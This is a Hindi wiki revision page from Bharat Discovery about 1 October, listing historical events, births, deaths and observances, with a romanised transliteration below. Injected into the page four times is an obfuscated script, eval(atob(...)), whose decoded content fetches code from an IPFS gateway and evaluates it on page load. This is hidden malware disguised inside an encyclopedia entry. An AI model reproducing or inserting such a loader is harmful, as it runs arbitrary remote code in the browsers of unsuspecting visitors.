Difference between revisions of "1 अक्टूबर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(40 intermediate revisions by 8 users not shown)
Line 4: Line 4:
  
 
==1 अक्टूबर की महत्त्वपूर्ण घटनाएँ==
 
==1 अक्टूबर की महत्त्वपूर्ण घटनाएँ==
* [[भारत]] में वरिष्ठ नागरिक दिवस
+
* [[भारत]] में [[अंतरराष्ट्रीय वरिष्ठ नागरिक दिवस|वरिष्ठ नागरिक दिवस]]
* 1854 - [[भारत]] में डाक टिकट का प्रचलन आरंभ हुआ। टिकट पर [[महारानी विक्टोरिया]] का सिर और [[भारत]] बना होता था। इसकी कीमत आधा आना (1/32 रुपये) थी।
+
* 1854 - [[भारत]] में [[डाक टिकट]] का प्रचलन आरंभ हुआ। टिकट पर [[महारानी विक्टोरिया]] का सिर और [[भारत]] बना होता था। इसकी कीमत आधा आना (1/32 रुपये) थी।
 +
* [[1919]]-  [[हन्टर समिति]] की स्थापना [[ब्रिटिश सरकार]] द्वारा 1 अक्टूबर, 1919 ई. को की गई थी।
 +
* [[1949]]- [[चीन]] में कम्युनिस्ट पार्टी के शासन की शुरुआत हुई।
 
* [[1949]] - जनरल माओ-त्से-तुंग द्वारा चीन जनवादी गणराज्य (पीपुल्स रिपब्लिक आफ़ चाइना) की घोषणा।  
 
* [[1949]] - जनरल माओ-त्से-तुंग द्वारा चीन जनवादी गणराज्य (पीपुल्स रिपब्लिक आफ़ चाइना) की घोषणा।  
* [[1967]]- भारतीय पर्यटन विकास निगम की स्थापना हुई।
+
* [[1953]]- [[आंध्र प्रदेश]] अलग राज्य बना।
 +
* [[1960]] - नाइज़ीरिया [[यूनाइटेड किंगडम]] से स्वतंत्र हुआ।
 +
* [[1967]] - भारतीय पर्यटन विकास निगम की स्थापना हुई।
 +
* [[1978]] - लड़कियों की शादी की उम्र को 14 से बढा कर 18 और लड़कों का 18 से बढा कर 21 [[वर्ष]] किया गया।
 
* [[1996]] - अमेरिकी राष्ट्रपति बिल क्लिंटन द्वारा पश्चिम एशिया शिखर सम्मेलन का उद्घाटन।  
 
* [[1996]] - अमेरिकी राष्ट्रपति बिल क्लिंटन द्वारा पश्चिम एशिया शिखर सम्मेलन का उद्घाटन।  
 
* [[1998]] - [[श्रीलंका]] में किलिनोच्ची एवं मानकुलम शहरों पर कब्ज़े के लिए सेना एवं लिट्टे उगवादियों के बीच हुए संघर्ष में 1300 लोगों की मृत्यु।  
 
* [[1998]] - [[श्रीलंका]] में किलिनोच्ची एवं मानकुलम शहरों पर कब्ज़े के लिए सेना एवं लिट्टे उगवादियों के बीच हुए संघर्ष में 1300 लोगों की मृत्यु।  
* [[2000]] - सिडनी में 27वें ओलम्पिक खेल सम्पन्न।  
+
* [[2000]] - [[सिडनी]] में 27वें [[ओलम्पिक खेल]] सम्पन्न।  
 +
* [[2002]] - [[एशियाड|एशियाड खेलों]] में [[स्नूकर]] प्रतिस्पर्द्धा में [[भारत]] को पहला स्वर्ण पदक प्राप्त हुआ।
 +
* [[2003]] - नदियों को जोड़ने के सम्बन्ध में [[बांग्लादेश]] की आशंकाओं को [[भारत]] ने दूर किया।
 +
* [[2004]] - इज़रायली प्रधानमंत्री एरियल शैरोन के मंत्रिमंडल ने गाजा पट्टी में बड़े पैमाने पर सैनिक कार्रवाई की योजना को मंजूरी दी।
 +
* [[2005]] - इंडोनेशिया के बाली में हुए बम विस्फोट में 40 लोगों की मृत्यु।
 +
* [[2006]] - इज़रायल ने लेबनान से अपनी सेना की आख़िरी टुकड़ी को भी वापस बुलाया।
 +
* [[2007]] - [[जापान]] ने उत्तर कोरिया के ख़िलाफ़ प्रतिबन्धों को अगले छ: [[महीने|महीनों]] तक बढ़ाने की घोषणा की।
 
* [[2008]]- आतंकवादियों ने [[त्रिपुरा]] की राजधानी [[अगरतला]] में बम ब्लास्ट किया।
 
* [[2008]]- आतंकवादियों ने [[त्रिपुरा]] की राजधानी [[अगरतला]] में बम ब्लास्ट किया।
 +
* [[2015]]- ग्वाटेमाला के संता काटरीना पिनुला में भारी बारिश और भूस्खलन से 280 लोगों की मौत।
 +
 
==1 अक्टूबर को जन्मे व्यक्ति==
 
==1 अक्टूबर को जन्मे व्यक्ति==
*1847 - [[एनी बेसेंट]], प्रख्यात समाजसेवी, लेखिका और स्वतंत्रता सेनानी
+
* [[2001]] - [[मनीष नरवाल]] - [[भारत]] के पैरा निशानेबाज़ हैं।
*[[1919]] - [[मजरुह सुल्तानपुरी]], हिन्दी फ़िल्मों के प्रसिद्ध गीतकार
+
* [[1995]] - [[गुरदीप सिंह]] - भारतीय भारोत्तोलक (वेटलिफ़्टर) हैं।
*[[1975]] - [[सचिन देव बर्मन]], बंगला और हिन्दी सिनेमा के प्रसिद्ध संगीतकार तथा गायक।
+
* [[1964]] - [[तापिर गाओ]] - [[अरुणाचल प्रदेश]] से [[भारतीय जनता पार्टी]] के राजनेता हैं।
 +
* [[1961]] - [[डॉ. सुकमा आचार्य]]- रोहतक जिले के रुड़की गांव के 'विश्ववारा कन्या गुरुकुल' की प्राचार्या हैं।
 +
* [[1842]] - [[एस. सुब्रह्मण्य अय्यर]]- स्वतंत्रता सेनानी, शिक्षाविद्‌ और सामाजिक कार्यकर्ता
 +
* [[1847]] - [[एनी बेसेंट]] - प्रख्यात समाजसेवी, लेखिका और स्वतंत्रता सेनानी
 +
* [[1895]] - [[लियाक़त अली ख़ाँ]] - [[पाकिस्तान]] के पहले [[प्रधानमंत्री]]
 +
* [[1901]]- [[प्रताप सिंह कैरों]]- स्वतंत्रता सेनानी एवं [[पंजाब]] के भूतपूर्व [[मुख्यमंत्री]]
 +
* [[1904]] - [[ए. के. गोपालन]] - [[केरल]] के प्रसिद्ध कम्युनिस्ट नेता और [[भारत]] के स्वतंत्रता सेनानी
 +
* [[1919]] - [[मजरूह सुल्तानपुरी]] -  [[हिन्दी]] फ़िल्मों के प्रसिद्ध गीतकार
 +
* [[1924]] - जिमी कार्टर - अमेरिका के 39वें राष्ट्रपति
 +
* [[1927]] - [[शिवाजी गणेशन]] - प्रसिद्ध तमिल अभिनेता
 +
* [[1928]] - [[सूरज भान]] - भारतीय राजनीतिज्ञ एवं दलित नेता
 +
* [[1930]] - [[जे. एच. पटेल]] - [[जनता दल]] के राजनीतिज्ञ थे, जो [[कर्नाटक]] के 15वें [[मुख्यमंत्री]] रहे।
 +
* [[1938]] - [[माइकल फ़रेरा]] - भारत के महान् बिलियर्ड्स खिलाड़ी
 +
* [[1952]] - [[शारदा सिन्हा]] - भारतीय राज्य [[बिहार]] की लोकप्रिय गायिका हैं।
 +
* [[1951]] - [[जी.एम.सी. बालायोगी]] - प्रसिद्ध राजनीतिज्ञ, पूर्व [[लोकसभा अध्यक्ष]]
 +
* [[1954]] - [[पुरुषोत्तम रूपाला]] - [[भारतीय जनता पार्टी]] के राजनीतिज्ञ हैं।
 +
* [[1966]] - [[त्रिलोक सिंह ठकुरेला]] - राजस्थान साहित्य अकादमी द्वारा पुरस्कृत
 +
* [[1975]] - [[सचिन देव बर्मन]] - बंगला और [[हिन्दी सिनेमा]] के प्रसिद्ध संगीतकार तथा गायक।
 +
* [[1951]] - [[एन. रेड्डप्पा]] - [[आंध्र प्रदेश]] से भारतीय राजनीतिज्ञ हैं।
 +
* [[1945]] - [[रामनाथ कोविंद]] - [[भारतीय जनता पार्टी]] (भाजपा) के राजनेता हैं। वे [[राज्य सभा]] के भी सदस्य रह चुके हैं।
 +
* [[1894]] - [[सुधी रंजन दास]] - [[भारत]] के भूतपूर्व पाँचवें मुख्य न्यायाधीश थे।
  
 
==1 अक्टूबर को हुए निधन==
 
==1 अक्टूबर को हुए निधन==
 +
* [[2001]] - [[सुरेन्द्रनाथ द्विवेदी]] - [[उड़ीसा]] के जानमाने राजनीतिज्ञ, सामाजिक कार्यकर्ता और पत्रकार थे।
 +
* [[1979]] - [[चन्दन सिंह गढ़वाली]] - [[भारत]] के क्रांतिकारी
  
 
==1 अक्टूबर के महत्त्वपूर्ण अवसर एवं उत्सव==
 
==1 अक्टूबर के महत्त्वपूर्ण अवसर एवं उत्सव==
* [[अन्तर्राष्ट्रीय वृद्धजन दिवस]],
+
* [[अंतरराष्ट्रीय वृद्ध दिवस|अंतरराष्ट्रीय वृद्धजन दिवस]]
* [[विश्व प्रौढ़ दिवस]],
+
* राष्ट्रीय स्वैच्छिक रक्तदान दिवस
* [[विश्व संगीत दिवस]],
+
* [[अन्तरराष्ट्रीय कॉफ़ी दिवस]]
* [[राष्ट्रीय स्वैच्छिक रक्तदान दिवस]]
 
  
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
 +
*[http://www.univarta.com/history-of-the-01-october/today-in-history/news/639946.html#beYtGLj7IVtfbKSV.99 univarta.com]
 
{{कैलंडर बाहरी कड़ियाँ}}
 
{{कैलंडर बाहरी कड़ियाँ}}
  

Latest revision as of 07:43, 16 July 2023

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

gregori kailandar ke anusar 1 aktoobar varsh ka 274 vaan (lip varsh mean yah 275 vaan) din hai. sal mean abhi aur 91 din shesh haian.

1 aktoobar ki mahattvapoorn ghatanaean

  • bharat mean varishth nagarik divas
  • 1854 - bharat mean dak tikat ka prachalan aranbh hua. tikat par maharani viktoriya ka sir aur bharat bana hota tha. isaki kimat adha ana (1/32 rupaye) thi.
  • 1919- hantar samiti ki sthapana british sarakar dvara 1 aktoobar, 1919 ee. ko ki gee thi.
  • 1949- chin mean kamyunist parti ke shasan ki shuruat huee.
  • 1949 - janaral mao-tse-tuang dvara chin janavadi ganarajy (pipuls ripablik af chaina) ki ghoshana.
  • 1953- aandhr pradesh alag rajy bana.
  • 1960 - naiziriya yoonaited kiangadam se svatantr hua.
  • 1967 - bharatiy paryatan vikas nigam ki sthapana huee.
  • 1978 - l dakiyoan ki shadi ki umr ko 14 se badha kar 18 aur l dakoan ka 18 se badha kar 21 varsh kiya gaya.
  • 1996 - ameriki rashtrapati bil kliantan dvara pashchim eshiya shikhar sammelan ka udghatan.
  • 1998 - shrilanka mean kilinochchi evan manakulam shaharoan par kabze ke lie sena evan litte ugavadiyoan ke bich hue sangharsh mean 1300 logoan ki mrityu.
  • 2000 - sidani mean 27vean olampik khel sampann.
  • 2002 - eshiyad kheloan mean snookar pratisparddha mean bharat ko pahala svarn padak prapt hua.
  • 2003 - nadiyoan ko jo dane ke sambandh mean baangladesh ki ashankaoan ko bharat ne door kiya.
  • 2004 - izarayali pradhanamantri eriyal shairon ke mantrimandal ne gaja patti mean b de paimane par sainik karravaee ki yojana ko manjoori di.
  • 2005 - iandoneshiya ke bali mean hue bam visphot mean 40 logoan ki mrityu.
  • 2006 - izarayal ne lebanan se apani sena ki akhiri tuk di ko bhi vapas bulaya.
  • 2007 - japan ne uttar koriya ke khilaf pratibandhoan ko agale chh: mahinoan tak badhane ki ghoshana ki.
  • 2008- atankavadiyoan ne tripura ki rajadhani agaratala mean bam blast kiya.
  • 2015- gvatemala ke santa katarina pinula mean bhari barish aur bhooskhalan se 280 logoan ki maut.

1 aktoobar ko janme vyakti

1 aktoobar ko hue nidhan

1 aktoobar ke mahattvapoorn avasar evan utsav

bahari k diyaan

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>